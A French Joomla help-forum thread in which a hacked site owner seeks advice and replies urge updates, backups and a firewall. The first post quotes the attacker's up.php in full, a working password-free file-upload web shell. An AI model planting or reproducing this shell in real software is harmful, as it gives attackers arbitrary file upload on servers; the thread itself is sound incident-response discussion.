Site hacké demande de conseils.

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Site hacké demande de conseils.

    Bonjour,
    Mon site a été hacké hier soir par
    Hacked by [...]
    (ils ont laissés un fichier x.htm à la racine)
    et un fichier up.php:
    <?php @set_time_limit(0);@header('null77: pOinter');?><form method='POST' enctype='multipart/form-data'><input type='file' name='f'/><input type='submit' value='up'/></form><?php echo @copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])?'ok':'no';?>

    qui permet d'envoyer des fichiers sur mon site sans qu'aucun mot de passe ne soit demandé
    ainsi que pas mal de fichiers du genre:
    components/com_gmapfp/images/brain/itunes/itunes/itunes/itunesconnect/877116fae9cf0253df063678930deeed/c/18bed2f63dbb1bede979653f34e2f7da/itc/css/background_gradient_black.html
    Je le sais grace à Eyesite.

    QuickScan ne me ramène aucune signature dangereuse. Je vais donc repartir d'un backup akeeba et installer de suite aeSecure.

    Je suis en version php 5.3.3 et Joomla! 3.2.7. J'ai essayé de chercher des mises à jour des extensions via l'admin de Joomla!, rien trouvé.
    Sur leur compte Facebook, ces hackers montrent des failles de jdownload,... et phocadownload que mon site utilise.

    J'aurai voulu avoir vos conseils pour empêcher ces pirates de recommencer (mes mots de passe tfp, Joomla! et php sont déjà balaises). Si il y a une faille dans phocodownload, comment je peux la "combler" ? Et comment je peux savoir si il n'y a pas une autre faille dans une autre extension ou module de Joomla! ?

    Merci d'avance de vos conseils.
    Dernière édition par daneel à 07/09/2016, 10h57 Raison: pas de nom de hacker... merci

  • #2
    Re : Site hacké demande de conseils.

    Bonjour

    Tu sembles être un utilisateur averti (tu connais déjà d'excellents outils :-D) et cela m'étonne que tu sois encore en J3.2.7 et, Oh my god, PHP 5.3. Tu as manqué des mises-à-jour de sécurité de Joomla (et là, je dirais que c'est un peu de ta faute), tu n'aurais pas encore installé un firewall et tu as une version de PHP morte depuis longtemps. Ton hébergeur ne te permet-il pas de passer à PHP 5.6 voire PHP 7 ?

    Pour le hack, les possibilités sont nombreuses (PHP 5.3, J3.2 ou encore un des composants / templates que tu as).

    Un bon gros nettoyage (peut-être plus simplement restaurer un backup qui était sain du site) et puis, hop hop, à tes mises-à-jour ! ;-)

    Bonne journée.
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

    Commentaire


    • #3
      Re : Site hacké demande de conseils.

      Envoyé par BilouMac71 Voir le message
      Je suis en version php 5.3.3 et Joomla! 3.2.7. J'ai essayé de chercher des mises à jour des extensions via l'admin de Joomla!, rien trouvé. Sur leur compte Facebook, ces hackers montrent des failles de jdownload,... et phocadownload que mon site utilise.

      J'aurai voulu avoir vos conseils pour empêcher ces pirates de recommencer (mes mots de passe tfp, Joomla! et php sont déjà balaises). Si il y a une faille dans phocodownload, comment je peux la "combler" ? Et comment je peux savoir si il n'y a pas une autre faille dans une autre extension ou module de Joomla! ?

      Merci d'avance de vos conseils.
      Bonjour,

      Ce serait logique d'avoir au moins les dernières versions des extensions et de Joomla ! Avec les mises à jour automatiques, les alertes et notifications, tu n'as plus aucune excuse

      Après il y a quelques consignes à respecter comme le choix de mot de passe, la sécurité de ton site, du serveur, de ton pc et compte mail. Tu peux aussi protéger l'identification (double authentification, captcha, anti brute force) et l'accès administration.
      Joomla User Group (JUG) Lille : https://www.facebook.com/groups/JUGLille/

      Commentaire


      • #4
        Re : Site hacké demande de conseils.

        Merci de vos réponses.
        J'attend une réponse de mon hébergeur pour la montée de version de php. Et du coup, ben je peux pas non plus monter de version de Joomla.

        Commentaire


        • #5
          Re : Site hacké demande de conseils.

          Est-ce que tu nous écris ici que ton hébergeur n'a pas prévu une procédure hyper simplissime pour monter de version de PHP ? Généralement cela se fait aisément en modifiant son .htaccess pour ajouter une petite ligne toute simple et/ou un autre fichier (je pense à .ovhconfig) ou, encore, via ton panneau de configuration.

          La dernière release de PHP 5.3, c'est 5.3.29 d'août 2014 => l'hébergeur n'aurait rien prévu pour permettre à ses clients de faire un upgrade ? Si ce dernier n'a pas une bonne raison de ... je commencerai à me poser des questions sur l'efficacité de ce dernier.
          Christophe (cavo789)
          Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
          Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

          Commentaire


          • #6
            Re : Site hacké demande de conseils.

            Oui, c'est cela.
            Dans mon panneau de conf de mon hébergement, je n'ai pas d'autre choix que php 5.3.3.

            Commentaire


            • #7
              Re : Site hacké demande de conseils.

              Bonjour,
              Qui est l'hebergeur ?
              Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
              Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

              Commentaire


              • #8
                Re : Site hacké demande de conseils.

                Bonjour,
                Mon hébergeur: E-Liance
                Je les ai contacté, ils me promettent une nouvelle plateforme avec les dernières versions de php avant la fin de l'année.
                J'ai donc installé une copie saine de notre site en local (en incluant les outils aesecure et eyesite) en Joomla! 3.2.7. Mon collègue qui gère les articles fera ses modif dessus. Ensuite je restaure le site local en prod.
                Un peu lourd mais je garde tout le temps au moins un site sain.

                Une petite question: mon hébergeur m'a aussi dit que sur cette nouvelle plateforme il y aura nginx (en remplacement de apache). Pas de pb avec Joomla! ?

                Commentaire


                • #9
                  Re : Site hacké demande de conseils.

                  Joomla fonctionne très bien.

                  Cependant Nginx n'utilise pas le fichier htaccess donc il faudra que tu t'informe si tu veux activer la réécriture ou ajouter des éléments de sécurité.

                  lire : https://docs.joomla.org/Nginx/fr

                  vieil exemple de nginx.conf proposé par nicholas (auteur d'akeeba) :
                  Security-enhancing .htaccess (Apache), web.config (IIS) and NginX configuration files for Joomla! - File not found · nikosdion/kyrion-htaccess




                  A noter qu'il existe des utilitaire de conversion code htaccess vers nginx comme : http://winginx.com/en/htaccess

                  Enfin je crois que le script aesecure ne fonctionne que pour apache et non pour nginx.
                  Joomla User Group (JUG) Lille : https://www.facebook.com/groups/JUGLille/

                  Commentaire


                  • #10
                    Re : Site hacké demande de conseils.

                    Ok, je suis pas sorti de l'auberge alors. Même avec la prochaine plateforme...
                    En tous cas merci à tous.

                    Commentaire

                    Annonce

                    Réduire
                    Aucune annonce pour le moment.

                    Partenaire de l'association

                    Réduire

                    Hébergeur Web PlanetHoster
                    Travaille ...
                    X